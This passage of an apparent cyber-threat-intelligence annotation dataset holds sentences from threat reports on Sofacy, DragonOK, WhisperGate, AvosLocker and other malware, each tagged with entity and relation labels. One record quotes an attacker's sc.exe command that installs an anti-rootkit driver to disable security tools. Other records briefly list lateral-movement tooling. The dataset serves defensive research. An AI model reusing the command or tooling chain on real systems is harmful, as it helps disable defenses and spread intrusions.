theft.","entities":[{"id":46358,"label":"attack-pattern","start_offset":175,"end_offset":191},{"id":46356,"label":"threat-actor","start_offset":109,"end_offset":134},{"id":46357,"label":"threat-actor","start_offset":91,"end_offset":100}],"relations":[{"id":182,"from_id":46357,"to_id":46358,"type":"uses"},{"id":183,"from_id":46356,"to_id":46358,"type":"uses"}],"Comments":[]} {"id":804,"text":" Credential theft today can happen in many ways, but the most notable are through credential phishing and the use of malware like keyloggers (both staples of the Sofacy group), as well as password reuse.","entities":[{"id":44859,"label":"attack-pattern","start_offset":1,"end_offset":17},{"id":44860,"label":"attack-pattern","start_offset":82,"end_offset":101},{"id":44861,"label":"attack-pattern","start_offset":130,"end_offset":140},{"id":44862,"label":"threat-actor","start_offset":162,"end_offset":174},{"id":44863,"label":"attack-pattern","start_offset":188,"end_offset":202}],"relations":[{"id":33,"from_id":44862,"to_id":44863,"type":"uses"},{"id":34,"from_id":44862,"to_id":44861,"type":"uses"},{"id":35,"from_id":44862,"to_id":44860,"type":"uses"},{"id":36,"from_id":44862,"to_id":44859,"type":"uses"}],"Comments":[]} {"id":837,"text":" While kernel APC attacks aren’t well known and can be hard to understand, their proven success in WanaCrypt0r\/WannaCry and the Petya\/NotPetya make them an important threat to understand because proven attack techniques are quickly adopted widely.","entities":[{"id":2746,"label":"malware","start_offset":128,"end_offset":133},{"id":44880,"label":"attack-pattern","start_offset":7,"end_offset":25},{"id":44881,"label":"malware","start_offset":99,"end_offset":110},{"id":44882,"label":"malware","start_offset":111,"end_offset":119},{"id":44884,"label":"malware","start_offset":134,"end_offset":142}],"relations":[{"id":185,"from_id":44882,"to_id":44880,"type":"uses"},{"id":186,"from_id":2746,"to_id":44880,"type":"uses"},{"id":184,"from_id":44881,"to_id":44880,"type":"uses"},{"id":187,"from_id":44884,"to_id":44880,"type":"uses"}],"Comments":[]} {"id":876,"text":"analysis sample PClock2 is written in Visual Basic.","entities":[{"id":46410,"label":"SOFTWARE","start_offset":39,"end_offset":51},{"id":44898,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":188,"from_id":44898,"to_id":46410,"type":"uses"}],"Comments":[]} {"id":914,"text":" It’s also interesting to note that each time PClock2 scans a directory or encrypts a file, it makes an HTTP POST request to the C2 server.","entities":[{"id":46436,"label":"Infrastucture","start_offset":129,"end_offset":138},{"id":46435,"label":"malware","start_offset":46,"end_offset":53}],"relations":[{"id":189,"from_id":46435,"to_id":46436,"type":"beacons-to"}],"Comments":[]} {"id":939,"text":" While not all SMS-based IAP applications steal user data, we recently identified that the Chinese Taomike SDK has begun capturing copies of all messages received by the phone and sending them to a Taomike controlled server.","entities":[{"id":46449,"label":"location","start_offset":91,"end_offset":98},{"id":44904,"label":"attack-pattern","start_offset":42,"end_offset":57},{"id":44905,"label":"malware","start_offset":99,"end_offset":110},{"id":44907,"label":"Infrastucture","start_offset":198,"end_offset":223}],"relations":[{"id":37,"from_id":44905,"to_id":44907,"type":"exfiltrates-to"},{"id":38,"from_id":44905,"to_id":44907,"type":"communicates-with"},{"id":190,"from_id":44905,"to_id":46449,"type":"located-at"},{"id":191,"from_id":44905,"to_id":44904,"type":"uses"}],"Comments":[]} {"id":947,"text":" Taomike is a Chinese company that aims to become the biggest mobile advertisement solution platform in China.","entities":[{"id":46455,"label":"identity","start_offset":1,"end_offset":8},{"id":46456,"label":"location","start_offset":14,"end_offset":21},{"id":46457,"label":"location","start_offset":104,"end_offset":109}],"relations":[{"id":192,"from_id":46455,"to_id":46456,"type":"located-at"}],"Comments":[]} {"id":952,"text":"Not all apps that use the Taomike library steal SMS messages.","entities":[{"id":46459,"label":"identity","start_offset":26,"end_offset":33},{"id":46460,"label":"attack-pattern","start_offset":42,"end_offset":60}],"relations":[{"id":193,"from_id":46459,"to_id":46460,"type":"uses"}],"Comments":[]} {"id":992,"text":"Recently, we found email accounts from top universities across the world being sold on Taobao, the largest consumer-to-consumer (C2C) e-commerce platform in China.","entities":[{"id":46489,"label":"SOFTWARE","start_offset":87,"end_offset":93},{"id":46490,"label":"location","start_offset":157,"end_offset":162}],"relations":[{"id":194,"from_id":46489,"to_id":46490,"type":"located-at"}],"Comments":[]} {"id":1035,"text":" Based on our investigation, we believe that stolen accounts for these universities are actively selling on Taobao.","entities":[{"id":44920,"label":"SOFTWARE","start_offset":108,"end_offset":114},{"id":44921,"label":"attack-pattern","start_offset":45,"end_offset":60}],"relations":[{"id":195,"from_id":44921,"to_id":44920,"type":"related-to"}],"Comments":[]} {"id":1252,"text":"Using AutoFocus to quickly search and correlate artifacts across the collective set of WildFire and other Palo Alto Networks threat intelligence, we were able to associate the attacks with the group publicly known as “DragonOK.”","entities":[{"id":3823,"label":"malware","start_offset":87,"end_offset":95},{"id":3826,"label":"threat-actor","start_offset":218,"end_offset":226},{"id":46628,"label":"SOFTWARE","start_offset":6,"end_offset":15},{"id":46629,"label":"identity","start_offset":106,"end_offset":124}],"relations":[{"id":196,"from_id":3826,"to_id":3823,"type":"authored-by"}],"Comments":[]} {"id":1254,"text":" DragonOK has previously targeted Japanese high-tech and manufacturing firms, but we’ve identified a new backdoor malware, named “FormerFirstRAT,” deployed by these attackers.","entities":[{"id":3828,"label":"threat-actor","start_offset":1,"end_offset":9},{"id":3832,"label":"malware","start_offset":130,"end_offset":144},{"id":44952,"label":"identity","start_offset":34,"end_offset":76}],"relations":[{"id":198,"from_id":3832,"to_id":3828,"type":"authored-by"},{"id":197,"from_id":3828,"to_id":44952,"type":"targets"}],"Comments":[]} {"id":1256,"text":" This campaign involved five separate phishing attacks, each carrying a different variant of Sysget malware, also known as HelloBridge.","entities":[{"id":46631,"label":"attack-pattern","start_offset":38,"end_offset":54},{"id":46632,"label":"malware","start_offset":93,"end_offset":99},{"id":46633,"label":"malware","start_offset":123,"end_offset":134}],"relations":[{"id":199,"from_id":46633,"to_id":46632,"type":"variant-of"}],"Comments":[]} {"id":1260,"text":" All of the Sysget files used in this campaign communicate with a single command and control (C2) server, hosted at biosnews[.]info.","entities":[{"id":44955,"label":"DOMAIN","start_offset":116,"end_offset":131},{"id":44956,"label":"Infrastucture","start_offset":73,"end_offset":105},{"id":44957,"label":"malware","start_offset":12,"end_offset":24}],"relations":[{"id":42,"from_id":44957,"to_id":44956,"type":"communicates-with"},{"id":201,"from_id":44956,"to_id":44955,"type":"hosts"}],"Comments":[]} {"id":1262,"text":"All five phishing campaigns targeted a Japanese manufacturing firm over the course of two months, but the final campaign also targeted a separate Japanese high-tech organization.","entities":[{"id":46637,"label":"attack-pattern","start_offset":9,"end_offset":27},{"id":46639,"label":"identity","start_offset":146,"end_offset":177},{"id":46638,"label":"identity","start_offset":39,"end_offset":61}],"relations":[{"id":203,"from_id":46637,"to_id":46639,"type":"targets"},{"id":202,"from_id":46637,"to_id":46638,"type":"targets"}],"Comments":[]} {"id":1266,"text":" Four of the five Sysget variants included a form of decoy document to trick users into believing they had opened a legitimate file rather than malware.","entities":[{"id":46642,"label":"malware","start_offset":18,"end_offset":24},{"id":44958,"label":"attack-pattern","start_offset":53,"end_offset":67}],"relations":[{"id":204,"from_id":46642,"to_id":44958,"type":"uses"}],"Comments":[]} {"id":1277,"text":"During analysis of this threat, we identified five additional backdoor tools hosted on biosnews[.]info which may be downloaded by the Sysget variants once the attackers have established a foothold.","entities":[{"id":46651,"label":"DOMAIN","start_offset":87,"end_offset":102},{"id":46652,"label":"malware","start_offset":134,"end_offset":140}],"relations":[{"id":206,"from_id":46651,"to_id":46652,"type":"hosts"}],"Comments":[]} {"id":1278,"text":" Three of the backdoors, NFlog, PoisonIvy, and NewCT have previously been publicly associated with DragonOK.","entities":[{"id":44962,"label":"malware","start_offset":25,"end_offset":30},{"id":44963,"label":"malware","start_offset":32,"end_offset":41},{"id":44964,"label":"malware","start_offset":47,"end_offset":52},{"id":44965,"label":"threat-actor","start_offset":99,"end_offset":107}],"relations":[{"id":48,"from_id":44962,"to_id":44965,"type":"authored-by"},{"id":47,"from_id":44963,"to_id":44965,"type":"authored-by"},{"id":46,"from_id":44964,"to_id":44965,"type":"authored-by"}],"Comments":[]} {"id":1283,"text":" Figure 7. Relationship between five additional backdoors used by DragonOK and their C2 servers in this campaign.","entities":[{"id":46655,"label":"threat-actor","start_offset":66,"end_offset":74},{"id":46656,"label":"Infrastucture","start_offset":85,"end_offset":95}],"relations":[{"id":208,"from_id":46655,"to_id":46656,"type":"uses"}],"Comments":[]} {"id":1320,"text":"FormerFirstRAT communicates using unencrypted HTTP over port 443; the use of mismatching ports and communication protocols is not uncommon in targeted attack campaigns.","entities":[{"id":3993,"label":"malware","start_offset":0,"end_offset":14},{"id":46669,"label":"campaign","start_offset":142,"end_offset":167}],"relations":[{"id":210,"from_id":46669,"to_id":3993,"type":"uses"}],"Comments":[]} {"id":1355,"text":" The CVE-2021-32648 vulnerability lies within the OctoberCMS platform prior to version 1.0.472 and results in an attacker gaining access to any account via a specially crafted account password reset request.","entities":[{"id":46687,"label":"vulnerability","start_offset":5,"end_offset":19},{"id":46688,"label":"SOFTWARE","start_offset":50,"end_offset":60}],"relations":[{"id":211,"from_id":46688,"to_id":46687,"type":"has"}],"Comments":[]} {"id":1359,"text":"Using our PoC, we created the following demonstration video of how a malicious actor would exploit the CVE-2021-32648 vulnerability, log into the compromised OctoberCMS account and to deface a web page hosted by the server:","entities":[{"id":44975,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":44976,"label":"SOFTWARE","start_offset":158,"end_offset":168}],"relations":[{"id":49,"from_id":44976,"to_id":44975,"type":"has"}],"Comments":[]} {"id":1360,"text":"To determine how this vulnerability was exploited, we analyzed the patch that developers added to OctoberCMS version 1.0.472 to mitigate the CVE-2021-32648 vulnerability.","entities":[{"id":46690,"label":"vulnerability","start_offset":141,"end_offset":155},{"id":46692,"label":"SOFTWARE","start_offset":98,"end_offset":108}],"relations":[{"id":212,"from_id":46692,"to_id":46690,"type":"has"}],"Comments":[]} {"id":1373,"text":"Stage1.exe purports to be ransomware, as it overwrites the target’s master boot record with 512 bytes and upon reboot displays the following ransom note: Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN).","entities":[{"id":46706,"label":"FILEPATH","start_offset":155,"end_offset":165},{"id":46707,"label":"Infrastucture","start_offset":256,"end_offset":296},{"id":46705,"label":"FILEPATH","start_offset":0,"end_offset":10}],"relations":[{"id":213,"from_id":46706,"to_id":46707,"type":"beacons-to"}],"Comments":[]} {"id":1392,"text":" Palo Alto Networks customers receive protections against the OctoberCMS vulnerability in the following ways: Palo Alto Networks customers receive protections against WhisperGate malware in the following ways: The Cortex XSOAR \"WhisperGate & CVE-2021-32648'' pack can help automatically detect and mitigate the two threats.","entities":[{"id":44991,"label":"identity","start_offset":1,"end_offset":19},{"id":44996,"label":"SOFTWARE","start_offset":216,"end_offset":228},{"id":44998,"label":"vulnerability","start_offset":244,"end_offset":258},{"id":44993,"label":"identity","start_offset":111,"end_offset":129},{"id":44994,"label":"vulnerability","start_offset":62,"end_offset":86},{"id":44995,"label":"malware","start_offset":168,"end_offset":179},{"id":4172,"label":"malware","start_offset":230,"end_offset":241}],"relations":[{"id":51,"from_id":44995,"to_id":44998,"type":"exploits"},{"id":214,"from_id":4172,"to_id":44998,"type":"exploits"}],"Comments":[]} {"id":1402,"text":" Kuluoz is a descendant of the Asprox malware and spreads by sending copies of itself as an e-mail attachment.","entities":[{"id":46751,"label":"malware","start_offset":31,"end_offset":37},{"id":46750,"label":"malware","start_offset":1,"end_offset":7},{"id":46752,"label":"attack-pattern","start_offset":61,"end_offset":109}],"relations":[{"id":216,"from_id":46750,"to_id":46751,"type":"variant-of"},{"id":217,"from_id":46751,"to_id":46752,"type":"uses"},{"id":218,"from_id":46750,"to_id":46752,"type":"uses"}],"Comments":[]} {"id":1404,"text":"Kuluoz makes money for its owner by installing other malware, such as crimeware or fake antivirus programs.","entities":[{"id":45008,"label":"malware","start_offset":0,"end_offset":6},{"id":45009,"label":"attack-pattern","start_offset":70,"end_offset":79},{"id":45010,"label":"attack-pattern","start_offset":83,"end_offset":106}],"relations":[{"id":53,"from_id":45008,"to_id":45009,"type":"uses"},{"id":54,"from_id":45008,"to_id":45010,"type":"uses"}],"Comments":[]} {"id":1416,"text":" Geographic Distribution of Koluoz Spam Nodes in North America Thus far we’ve detected the following command and control servers in use.","entities":[{"id":45013,"label":"Infrastucture","start_offset":35,"end_offset":45},{"id":45016,"label":"Infrastucture","start_offset":103,"end_offset":121},{"id":45012,"label":"malware","start_offset":28,"end_offset":34},{"id":45014,"label":"location","start_offset":49,"end_offset":62}],"relations":[{"id":55,"from_id":45012,"to_id":45013,"type":"communicates-with"},{"id":56,"from_id":45013,"to_id":45014,"type":"located-at"}],"Comments":[]} {"id":1479,"text":"In addition to our research, the Baidu Security team in China recently found 23 mobile banking apps sharing the same certificate hosted by a third party app developer and reported the discovery to the CNCERT in China.","entities":[{"id":45023,"label":"location","start_offset":56,"end_offset":61},{"id":45025,"label":"location","start_offset":211,"end_offset":216},{"id":45026,"label":"identity","start_offset":201,"end_offset":207},{"id":45024,"label":"identity","start_offset":33,"end_offset":52}],"relations":[{"id":58,"from_id":45026,"to_id":45025,"type":"located-at"},{"id":219,"from_id":45024,"to_id":45023,"type":"located-at"}],"Comments":[]} {"id":1503,"text":" Recently Palo Alto Networks discovered a backdoor program ( md5: b826fb1253a52a3b53afa3b7543d7694, sha256: 6bedd1b0716fe7632188932451f75295346836545e6d2bfee1b56121e02ca110 ) that is used to control a linux operating system.","entities":[{"id":45032,"label":"SHA2","start_offset":108,"end_offset":172},{"id":45033,"label":"identity","start_offset":10,"end_offset":28},{"id":45031,"label":"MD5","start_offset":66,"end_offset":98},{"id":45034,"label":"SOFTWARE","start_offset":201,"end_offset":223}],"relations":[{"id":220,"from_id":45031,"to_id":45032,"type":"related-to"}],"Comments":[]} {"id":1529,"text":"This post is also available in: 日本語 (Japanese) In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.","entities":[{"id":46789,"label":"TIME","start_offset":56,"end_offset":65},{"id":46790,"label":"identity","start_offset":67,"end_offset":76},{"id":46791,"label":"vulnerability","start_offset":105,"end_offset":118},{"id":46792,"label":"vulnerability","start_offset":121,"end_offset":176},{"id":46793,"label":"attack-pattern","start_offset":187,"end_offset":214}],"relations":[{"id":221,"from_id":46791,"to_id":46792,"type":"related-to"},{"id":223,"from_id":46793,"to_id":46791,"type":"targets"},{"id":222,"from_id":46793,"to_id":46792,"type":"targets"}],"Comments":[]} {"id":1540,"text":"Overview Palo Alto Networks Unit 42 threat research team has just uncovered a new set of attacks by the Sofacy group using malicious emails targeting foreign affairs agencies and ministries in North America and Europe, including a European embassy in Moscow.","entities":[{"id":46799,"label":"identity","start_offset":9,"end_offset":56},{"id":46801,"label":"location","start_offset":193,"end_offset":206},{"id":46802,"label":"location","start_offset":211,"end_offset":217},{"id":46806,"label":"attack-pattern","start_offset":123,"end_offset":139},{"id":46808,"label":"location","start_offset":251,"end_offset":257},{"id":46807,"label":"identity","start_offset":231,"end_offset":247},{"id":46805,"label":"threat-actor","start_offset":104,"end_offset":116}],"relations":[{"id":226,"from_id":46805,"to_id":46806,"type":"uses"},{"id":227,"from_id":46807,"to_id":46808,"type":"located-at"},{"id":228,"from_id":46805,"to_id":46807,"type":"targets"},{"id":229,"from_id":46805,"to_id":46801,"type":"targets"},{"id":230,"from_id":46805,"to_id":46802,"type":"targets"}],"Comments":[]} {"id":1542,"text":"The Sofacy Group (AKA APT28, Grizzly Steppe, Fancy Bear, STRONTIUM, Sednit, Tsar Team, Pawn Storm) is a well-known hacking organization widely reported to be associated with Russia by the US Intelligence Community, numerous media reports and other cybersecurity companies.","entities":[{"id":45045,"label":"threat-actor","start_offset":4,"end_offset":16},{"id":45046,"label":"threat-actor","start_offset":22,"end_offset":27},{"id":45051,"label":"threat-actor","start_offset":76,"end_offset":85},{"id":45052,"label":"threat-actor","start_offset":87,"end_offset":97},{"id":45053,"label":"location","start_offset":174,"end_offset":180},{"id":45054,"label":"identity","start_offset":188,"end_offset":213},{"id":45047,"label":"threat-actor","start_offset":29,"end_offset":43},{"id":45048,"label":"threat-actor","start_offset":45,"end_offset":55},{"id":45049,"label":"threat-actor","start_offset":57,"end_offset":66},{"id":45050,"label":"threat-actor","start_offset":68,"end_offset":74}],"relations":[{"id":59,"from_id":45045,"to_id":45053,"type":"located-at"},{"id":60,"from_id":45046,"to_id":45053,"type":"located-at"},{"id":62,"from_id":45048,"to_id":45053,"type":"located-at"},{"id":63,"from_id":45049,"to_id":45053,"type":"located-at"},{"id":64,"from_id":45050,"to_id":45053,"type":"located-at"},{"id":68,"from_id":45046,"to_id":45045,"type":"duplicate-of"},{"id":69,"from_id":45047,"to_id":45045,"type":"duplicate-of"},{"id":65,"from_id":45051,"to_id":45053,"type":"located-at"},{"id":66,"from_id":45052,"to_id":45053,"type":"located-at"},{"id":70,"from_id":45048,"to_id":45045,"type":"duplicate-of"},{"id":71,"from_id":45049,"to_id":45045,"type":"duplicate-of"},{"id":72,"from_id":45050,"to_id":45045,"type":"duplicate-of"},{"id":61,"from_id":45047,"to_id":45053,"type":"located-at"},{"id":73,"from_id":45051,"to_id":45045,"type":"duplicate-of"},{"id":74,"from_id":45052,"to_id":45045,"type":"duplicate-of"}],"Comments":[]} {"id":1543,"text":" Sofacy Group has been associated with many attacks against targets around the world, including the International Olympic Committee (IOC) in 2018, the World Anti-Doping Agency in 2016, the Dutch Safety Board in 2015, and German, French, Ukrainian, and Dutch political and military targets throughout 2014 through 2018.","entities":[{"id":46818,"label":"location","start_offset":221,"end_offset":227},{"id":46819,"label":"location","start_offset":229,"end_offset":235},{"id":46820,"label":"location","start_offset":237,"end_offset":246},{"id":46822,"label":"identity","start_offset":151,"end_offset":175},{"id":46812,"label":"identity","start_offset":100,"end_offset":137},{"id":46813,"label":"TIME","start_offset":141,"end_offset":145},{"id":46814,"label":"TIME","start_offset":300,"end_offset":304},{"id":46816,"label":"TIME","start_offset":179,"end_offset":183},{"id":46821,"label":"location","start_offset":252,"end_offset":257},{"id":46823,"label":"identity","start_offset":189,"end_offset":207},{"id":46824,"label":"identity","start_offset":258,"end_offset":288},{"id":46811,"label":"threat-actor","start_offset":1,"end_offset":13},{"id":46815,"label":"TIME","start_offset":313,"end_offset":317},{"id":46817,"label":"TIME","start_offset":211,"end_offset":215}],"relations":[{"id":231,"from_id":46811,"to_id":46812,"type":"targets"},{"id":232,"from_id":46811,"to_id":46822,"type":"targets"},{"id":233,"from_id":46811,"to_id":46823,"type":"targets"},{"id":234,"from_id":46811,"to_id":46824,"type":"targets"},{"id":236,"from_id":46824,"to_id":46818,"type":"located-at"},{"id":237,"from_id":46824,"to_id":46819,"type":"located-at"},{"id":238,"from_id":46824,"to_id":46820,"type":"located-at"},{"id":239,"from_id":46824,"to_id":46821,"type":"located-at"}],"Comments":[]} {"id":1569,"text":" Bad Rabbit is a ransomware attack that, at the time of this writing, appears to primarily be affecting countries in Eastern Europe.","entities":[{"id":45059,"label":"malware","start_offset":1,"end_offset":11},{"id":45060,"label":"location","start_offset":117,"end_offset":131}],"relations":[{"id":75,"from_id":45059,"to_id":45060,"type":"targets"}],"Comments":[]} {"id":1572,"text":" As detailed below, Bad Rabbit gains initial entry by posing as an Adobe Flash update.","entities":[{"id":45062,"label":"malware","start_offset":20,"end_offset":30},{"id":45063,"label":"SOFTWARE","start_offset":67,"end_offset":78}],"relations":[{"id":240,"from_id":45062,"to_id":45063,"type":"related-to"}],"Comments":[]} {"id":1580,"text":" According to ESET, the initial infection vector for Bad Rabbit is through a fake Adobe Flash update that is offered up from compromised websites.","entities":[{"id":4716,"label":"malware","start_offset":53,"end_offset":63},{"id":46834,"label":"identity","start_offset":14,"end_offset":18},{"id":46835,"label":"SOFTWARE","start_offset":82,"end_offset":93}],"relations":[{"id":241,"from_id":4716,"to_id":46835,"type":"related-to"}],"Comments":[]} {"id":1584,"text":"Reports indicate that it harvests credentials using Mimikatz and Maarten van Dantzig reports it also uses common hardcoded credentials to spread.","entities":[{"id":45067,"label":"tools","start_offset":52,"end_offset":60},{"id":45068,"label":"identity","start_offset":65,"end_offset":84},{"id":45069,"label":"attack-pattern","start_offset":25,"end_offset":45}],"relations":[{"id":76,"from_id":45069,"to_id":45067,"type":"uses"}],"Comments":[]} {"id":1640,"text":" In total we’ve found 18 different applications in the Google Play store that contain the Funtasy Trojan.","entities":[{"id":46863,"label":"malware","start_offset":90,"end_offset":97},{"id":46864,"label":"SOFTWARE","start_offset":55,"end_offset":66}],"relations":[{"id":242,"from_id":46864,"to_id":46863,"type":"hosts"}],"Comments":[]} {"id":1654,"text":" Of particular note is how these actors use a Remote Administration Tool (RAT) named NetWire (part of the NetWiredRC malware family).","entities":[{"id":46866,"label":"malware","start_offset":85,"end_offset":92},{"id":46867,"label":"malware","start_offset":106,"end_offset":116}],"relations":[{"id":243,"from_id":46866,"to_id":46867,"type":"variant-of"}],"Comments":[]} {"id":1687,"text":"While the SunOrcal malware family has been confirmed to have been active since 2013, possibly even earlier, this new variant has been observed targeting regions outside of the typical target radius for this threat group, now expanding to include Vietnam and Myanmar.","entities":[{"id":5005,"label":"malware","start_offset":10,"end_offset":18},{"id":46877,"label":"TIME","start_offset":79,"end_offset":83},{"id":46878,"label":"location","start_offset":246,"end_offset":253},{"id":46879,"label":"location","start_offset":258,"end_offset":265}],"relations":[{"id":244,"from_id":5005,"to_id":46878,"type":"targets"},{"id":246,"from_id":5005,"to_id":46879,"type":"targets"}],"Comments":[]} {"id":1708,"text":" Last year we highlighted two malware families on this blog: CryptoWall 2.0 and Dyreza\/Dyre.","entities":[{"id":46883,"label":"malware","start_offset":61,"end_offset":75},{"id":46884,"label":"malware","start_offset":80,"end_offset":86},{"id":46885,"label":"malware","start_offset":87,"end_offset":91}],"relations":[{"id":247,"from_id":46884,"to_id":46885,"type":"duplicate-of"}],"Comments":[]} {"id":1711,"text":" In October, CryptoWall 2.0 began using the Tor anonymity network to serve web pages to infected users who wanted their encrypted files back.","entities":[{"id":5083,"label":"tools","start_offset":44,"end_offset":47},{"id":46886,"label":"TIME","start_offset":4,"end_offset":11},{"id":46887,"label":"malware","start_offset":13,"end_offset":27}],"relations":[{"id":248,"from_id":46887,"to_id":5083,"type":"uses"}],"Comments":[]} {"id":1712,"text":"In this case a legitimate service (Tor) was being abused by CryptoWall so it could avoid having its C2 servers shut down.","entities":[{"id":5086,"label":"malware","start_offset":60,"end_offset":70},{"id":5085,"label":"tools","start_offset":35,"end_offset":38}],"relations":[{"id":249,"from_id":5086,"to_id":5085,"type":"uses"}],"Comments":[]} {"id":1716,"text":"I2P users can access specific I2P services that are only accessible on I2P, or access Internet resources without exposing their IP address. In the case of CryptoWall 3.0, the malware is attempting to access multiple .i2p resources only accessible through I2P, also known as “eepSites.” The CryptoWall 3.0 uses I2P in the same way CryptoWall 2.0 used Tor, to give victims access to a decrypting service to get their files back.","entities":[{"id":45105,"label":"SOFTWARE","start_offset":71,"end_offset":74},{"id":45104,"label":"SOFTWARE","start_offset":30,"end_offset":33},{"id":45106,"label":"malware","start_offset":156,"end_offset":170},{"id":45107,"label":"SOFTWARE","start_offset":256,"end_offset":260},{"id":45108,"label":"malware","start_offset":292,"end_offset":306},{"id":45110,"label":"SOFTWARE","start_offset":312,"end_offset":315},{"id":45111,"label":"malware","start_offset":332,"end_offset":346},{"id":45103,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":5104,"label":"tools","start_offset":352,"end_offset":355}],"relations":[{"id":250,"from_id":45111,"to_id":5104,"type":"uses"},{"id":252,"from_id":45108,"to_id":45111,"type":"related-to"},{"id":253,"from_id":45106,"to_id":45107,"type":"uses"},{"id":251,"from_id":45108,"to_id":45110,"type":"uses"}],"Comments":[]} {"id":1757,"text":"And before long, Yuki Chen (@guhe120), a Chinese researcher, posted his answer.","entities":[{"id":46908,"label":"identity","start_offset":28,"end_offset":36},{"id":46907,"label":"identity","start_offset":17,"end_offset":26},{"id":46909,"label":"location","start_offset":41,"end_offset":48}],"relations":[{"id":254,"from_id":46907,"to_id":46908,"type":"duplicate-of"},{"id":255,"from_id":46907,"to_id":46909,"type":"located-at"},{"id":256,"from_id":46908,"to_id":46909,"type":"located-at"}],"Comments":[]} {"id":1787,"text":"While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys). ","entities":[{"id":5285,"label":"malware","start_offset":15,"end_offset":25},{"id":46915,"label":"FILEPATH","start_offset":212,"end_offset":224},{"id":46916,"label":"SOFTWARE","start_offset":180,"end_offset":205},{"id":46917,"label":"location","start_offset":108,"end_offset":110}],"relations":[{"id":257,"from_id":5285,"to_id":46916,"type":"targets"},{"id":258,"from_id":5285,"to_id":46917,"type":"targets"}],"Comments":[]} {"id":1789,"text":"Infection chain Figure 1. AvosLocker infection chain According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit: Figure 2.","entities":[{"id":5293,"label":"malware","start_offset":31,"end_offset":41},{"id":46920,"label":"vulnerability","start_offset":127,"end_offset":178}],"relations":[{"id":260,"from_id":5293,"to_id":46920,"type":"exploits"}],"Comments":[]} {"id":1790,"text":"The ADSS exploit abusing CVE-2021-40539 Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used.","entities":[{"id":46921,"label":"vulnerability","start_offset":25,"end_offset":39},{"id":46922,"label":"malware","start_offset":4,"end_offset":8}],"relations":[{"id":261,"from_id":46922,"to_id":46921,"type":"exploits"}],"Comments":[]} {"id":1810,"text":"The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.","entities":[{"id":46930,"label":"tools","start_offset":4,"end_offset":14},{"id":46931,"label":"tools","start_offset":71,"end_offset":81}],"relations":[{"id":262,"from_id":46930,"to_id":46931,"type":"downloads"}],"Comments":[]} {"id":1811,"text":" Figure 9. The PowerShell downloading and installing AnyDeskMSI ","entities":[{"id":5340,"label":"tools","start_offset":19,"end_offset":29},{"id":46932,"label":"tools","start_offset":57,"end_offset":67}],"relations":[{"id":263,"from_id":5340,"to_id":46932,"type":"downloads"}],"Comments":[]} {"id":1819,"text":"Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products.","entities":[{"id":46934,"label":"tools","start_offset":77,"end_offset":87},{"id":46936,"label":"attack-pattern","start_offset":91,"end_offset":113},{"id":46937,"label":"attack-pattern","start_offset":118,"end_offset":143}],"relations":[{"id":265,"from_id":46934,"to_id":46936,"type":"uses"},{"id":266,"from_id":46934,"to_id":46937,"type":"uses"}],"Comments":[]} {"id":1820,"text":"The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions.","entities":[{"id":46938,"label":"tools","start_offset":28,"end_offset":35},{"id":46944,"label":"tools","start_offset":158,"end_offset":166},{"id":46951,"label":"attack-pattern","start_offset":294,"end_offset":321},{"id":46940,"label":"tools","start_offset":79,"end_offset":83},{"id":46942,"label":"FILEPATH","start_offset":85,"end_offset":98},{"id":46947,"label":"tools","start_offset":171,"end_offset":179},{"id":46939,"label":"tools","start_offset":42,"end_offset":49},{"id":46943,"label":"vulnerability","start_offset":113,"end_offset":122},{"id":46950,"label":"FILEPATH","start_offset":276,"end_offset":288},{"id":46948,"label":"attack-pattern","start_offset":185,"end_offset":201},{"id":46949,"label":"attack-pattern","start_offset":218,"end_offset":253},{"id":46953,"label":"tools","start_offset":202,"end_offset":212},{"id":46956,"label":"tools","start_offset":276,"end_offset":284},{"id":46955,"label":"attack-pattern","start_offset":104,"end_offset":108}],"relations":[{"id":272,"from_id":46938,"to_id":46947,"type":"downloads"},{"id":267,"from_id":46938,"to_id":46939,"type":"downloads"},{"id":268,"from_id":46938,"to_id":46940,"type":"downloads"},{"id":269,"from_id":46940,"to_id":46942,"type":"uses"},{"id":271,"from_id":46938,"to_id":46944,"type":"downloads"},{"id":273,"from_id":46938,"to_id":46953,"type":"downloads"},{"id":276,"from_id":46938,"to_id":46956,"type":"downloads"}],"Comments":[]} {"id":1823,"text":"We found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe create aswSP_ArPot2 binPath= C:\\windows\\aswArPot.sys type= kernel.","entities":[{"id":46957,"label":"FILEPATH","start_offset":60,"end_offset":72},{"id":46958,"label":"FILEPATH","start_offset":92,"end_offset":98},{"id":46959,"label":"FILEPATH","start_offset":129,"end_offset":152},{"id":46960,"label":"SOFTWARE","start_offset":12,"end_offset":37}],"relations":[{"id":279,"from_id":46960,"to_id":46957,"type":"consists-of"}],"Comments":[]} {"id":1828,"text":"Mimikatz components were also copied to the affected machine via AnyDeskMSI.","entities":[{"id":5378,"label":"tools","start_offset":0,"end_offset":8},{"id":46961,"label":"tools","start_offset":65,"end_offset":75}],"relations":[{"id":277,"from_id":46961,"to_id":5378,"type":"drops"}],"Comments":[]} {"id":1831,"text":"Detecting and deleting Mimikatz We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit 